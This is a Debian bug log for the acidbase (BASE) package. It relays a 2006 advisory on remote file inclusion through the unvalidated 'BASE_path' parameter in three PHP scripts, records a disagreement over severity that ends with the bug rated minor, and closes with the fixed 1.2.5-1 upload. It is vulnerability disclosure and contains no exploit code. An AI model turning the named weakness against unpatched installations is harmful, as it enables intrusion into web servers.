Debian Bug report logs - #370576
acidbase: Remote File Inclusion Vulnerabilities

version graph

Package: acidbase; Maintainer for acidbase is (unknown);

Reported by: David Gil <dgil@telefonica.net>

Date: Mon, 5 Jun 2006 23:03:06 UTC

Severity: minor

Tags: fixed-upstream, security

Fixed in version acidbase/1.2.5-1

Done: David Gil <dgil@telefonica.net>

Bug is archived. No further changes may be made.

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 06 Jun 2006 00:24:25 +0200
Package: acidbase
Severity: grave
Tags: security
Justification: user security hole

 http://www.frsirt.com/english/advisories/2006/1996

 Advisory ID : FrSIRT/ADV-2006-1996
 CVE ID : GENERIC-MAP-NOMATCH
 Rated as : High Risk 
 Remotely Exploitable : Yes
 Locally Exploitable : Yes
 Release Date : 2006-05-26

 Technical Description

 Multiple vulnerabilities have been identified in Basic Analysis and Security
 Engine (BASE), which could be exploited by attackers to execute arbitrary
 commands. These flaws are due to input validation errors in the
 "base_qry_common.php", "base_stat_common.php", and
 "includes/base_include.inc.php" scripts that do not validate the "BASE_path"
 parameter, which could be exploited by remote attackers to include malicious
 scripts and execute arbitrary commands with the privileges of the web server.

 Affected Products

 Basic Analysis and Security Engine (BASE) 1.2.4 and prior 

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.16-2-686
Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list. (full text, mbox, link).


Message #10 received at 370576@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: 370576@bugs.debian.org
Cc: control@bugs.debian.org
Subject: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 06 Jun 2006 01:41:57 +0200
tags 370576 + fixed-upstream pending
thanks

Fixed in upstream BASE 1.2.5 (sarah). Expect a new package in a few
days.





Tags added: fixed-upstream, pending Request was from David Gil <dgil@telefonica.net> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Message #17 received at submit@bugs.debian.org (full text, mbox, reply):

From: Kevin Johnson <kjohnson@secureideas.net>
To: David Gil <dgil@telefonica.net>, 370576@bugs.debian.org
Cc: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 6 Jun 2006 13:01:11 -0400
I have to disagree with the Severity of grave.  To exploit you need  
to have register_globals set to on which has not been the default in  
years.  We have released 1.2.5 which fixes the issue and a number of  
other things.  It just gets under my skin when "researchers" find  
problems, elevate how serious they are and never notify the  
development team.

Sorry for my rant,
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!

On Jun 5, 2006, at 6:24 PM, David Gil wrote:

> Package: acidbase
> Severity: grave
> Tags: security
> Justification: user security hole
>
>  http://www.frsirt.com/english/advisories/2006/1996
>
>  Advisory ID : FrSIRT/ADV-2006-1996
>  CVE ID : GENERIC-MAP-NOMATCH
>  Rated as : High Risk
>  Remotely Exploitable : Yes
>  Locally Exploitable : Yes
>  Release Date : 2006-05-26
>
>  Technical Description
>
>  Multiple vulnerabilities have been identified in Basic Analysis  
> and Security
>  Engine (BASE), which could be exploited by attackers to execute  
> arbitrary
>  commands. These flaws are due to input validation errors in the
>  "base_qry_common.php", "base_stat_common.php", and
>  "includes/base_include.inc.php" scripts that do not validate the  
> "BASE_path"
>  parameter, which could be exploited by remote attackers to include  
> malicious
>  scripts and execute arbitrary commands with the privileges of the  
> web server.
>
>  Affected Products
>
>  Basic Analysis and Security Engine (BASE) 1.2.4 and prior
>
> -- System Information:
> Debian Release: testing/unstable
>   APT prefers unstable
>   APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
> Architecture: i386 (i686)
> Shell:  /bin/sh linked to /bin/bash
> Kernel: Linux 2.6.16-2-686
> Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
>
>






Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list. (full text, mbox, link).


Message #27 received at 370576@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: Kevin Johnson <kjohnson@secureideas.net>, 370576@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Wed, 07 Jun 2006 11:08:29 +0200
severity 370576 minor
thanks

El mar, 06-06-2006 a las 13:01 -0400, Kevin Johnson escribió:
> I have to disagree with the Severity of grave.  To exploit you need  
> to have register_globals set to on which has not been the default in  
> years. 

Ok, now the bug has a minor severity. You are right, base is not
exploitable with the default installation of the package.

> We have released 1.2.5 which fixes the issue and a number of  
> other things.

Yes, I am aware of it. We'll upload it in a few days. I've submitted the
bug report to inform the security team (testing distribution has also
base 1.2.4) and to explain more in deep the changes in the 1.2.5
changelog.

> It just gets under my skin when "researchers" find  
> problems, elevate how serious they are and never notify the  
> development team.

Well, I don't understand you Kevin. I know you are subscribed to the
package tracking system of acidbase, so I know that you receive all the
bugs submitted to the package too. If you don't agree with the severty
of a bug, you can always change it as I've just done.

> Sorry for my rant,
> Kevin

Regards,
David.





Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Message #32 received at 370576@bugs.debian.org (full text, mbox, reply):

From: Kevin Johnson <kjohnson@secureideas.net>
To: David Gil <dgil@telefonica.net>
Cc: 370576@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Wed, 7 Jun 2006 07:09:37 -0400
On Jun 7, 2006, at 5:08 AM, David Gil wrote:

> severity 370576 minor
> thanks
>

Thanks...

> El mar, 06-06-2006 a las 13:01 -0400, Kevin Johnson escribió:
>> I have to disagree with the Severity of grave.  To exploit you need
>> to have register_globals set to on which has not been the default in
>> years.
>
> Ok, now the bug has a minor severity. You are right, base is not
> exploitable with the default installation of the package.
>
>> We have released 1.2.5 which fixes the issue and a number of
>> other things.
>
> Yes, I am aware of it. We'll upload it in a few days. I've  
> submitted the
> bug report to inform the security team (testing distribution has also
> base 1.2.4) and to explain more in deep the changes in the 1.2.5
> changelog.
>

Great... I appreciate it...

>> It just gets under my skin when "researchers" find
>> problems, elevate how serious they are and never notify the
>> development team.
>
> Well, I don't understand you Kevin. I know you are subscribed to the
> package tracking system of acidbase, so I know that you receive all  
> the
> bugs submitted to the package too. If you don't agree with the severty
> of a bug, you can always change it as I've just done.
>

Sorry this was not meant toward you.  I was speaking of St0ke and  
Milw0rm.  I apologize for venting at you and the bug tracking  
system.  As too changing the severity I forgot.  We have been busy  
around here since my new daughter arrived Monday.

>> Sorry for my rant,
>> Kevin
>
> Regards,
> David.
>
>

Thanks
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!





Severity set to `minor' from `grave' Request was from David Gil <dgil@telefonica.net> to control@bugs.debian.org. (full text, mbox, link).


Reply sent to David Gil <dgil@telefonica.net>:
You have taken responsibility. (full text, mbox, link).


Notification sent to David Gil <dgil@telefonica.net>:
Bug acknowledged by developer. (full text, mbox, link).


Message #39 received at 370576-close@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: 370576-close@bugs.debian.org
Subject: Bug#370576: fixed in acidbase 1.2.5-1
Date: Tue, 13 Jun 2006 11:02:04 -0700
Source: acidbase
Source-Version: 1.2.5-1

We believe that the bug you reported is fixed in the latest version of
acidbase, which is due to be installed in the Debian FTP archive:

acidbase_1.2.5-1.diff.gz
  to pool/main/a/acidbase/acidbase_1.2.5-1.diff.gz
acidbase_1.2.5-1.dsc
  to pool/main/a/acidbase/acidbase_1.2.5-1.dsc
acidbase_1.2.5-1_all.deb
  to pool/main/a/acidbase/acidbase_1.2.5-1_all.deb
acidbase_1.2.5.orig.tar.gz
  to pool/main/a/acidbase/acidbase_1.2.5.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 370576@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
David Gil <dgil@telefonica.net> (supplier of updated acidbase package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Mon, 12 Jun 2006 21:20:37 +0200
Source: acidbase
Binary: acidbase
Architecture: source all
Version: 1.2.5-1
Distribution: unstable
Urgency: high
Maintainer: David Gil <dgil@telefonica.net>
Changed-By: David Gil <dgil@telefonica.net>
Description: 
 acidbase   - Basic Analysis and Security Engine
Closes: 363548 370576
Changes: 
 acidbase (1.2.5-1) unstable; urgency=high
 .
   * New upstream release, wich includes the following security improvements:
      + Added XSSPrintSafe() (array safe htmlspecilchars() function) and made
        filterSql() use ADOdb qmagic()
      + Filtered all unfiltred (mainly auth system stuff) $_POST and $_GET
        variables using filterSql()
      + Santized all $_SERVER variables to be protected against XSS attacks
     These improvements fix the following security bugs:
      + Cross-site scripting (XSS) vulnerability (CVE-2006-1590)
        (Closes: #363548).
      + Remote File Inclusion Vulnerabilities (CVE-2006-2685)
        (Closes: #370576).
 .
   * debian/patches/02_update_external_links.dpatch : updated.
 .
   * Applied part of the patch from Paul Wise <pabs3@bonedaddy.net>:
     + Remove short description from long description
     + Update copyright file with more information
 .
   * Bump Standards-Version to 3.7.2 (no policy-related changes needed).
 .
   * Fix an annoying dbconfig-common error: Add dbc_dbtypes variable in
     mantainer scripts, not only in config file.
     This is related to bug #372948 (dbconfig-common: can not determine the
     database type).
 .
   * Remove ucf file under /etc/acidbase on package purge.
Files: 
 1627500fb735f4ce19a137031d59c0c3 683 web optional acidbase_1.2.5-1.dsc
 cd6a83df67106ebf9a148d5ac1ec9b8c 335819 web optional acidbase_1.2.5.orig.tar.gz
 3cc7ab0405eaf4e2539f64a175af64f6 14891 web optional acidbase_1.2.5-1.diff.gz
 15ce906b026e9bb7d89a4c9dd600e28d 346322 web optional acidbase_1.2.5-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFEjvmKsandgtyBSwkRAhSVAJ46v7d4R2rcEEMNf+YoI26PdkVpDACfdtKL
d9OHPfMIsMKT1oNU4OeTlf4=
=YUKe
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 26 Jun 2007 14:50:10 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 11:51:16 2025; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.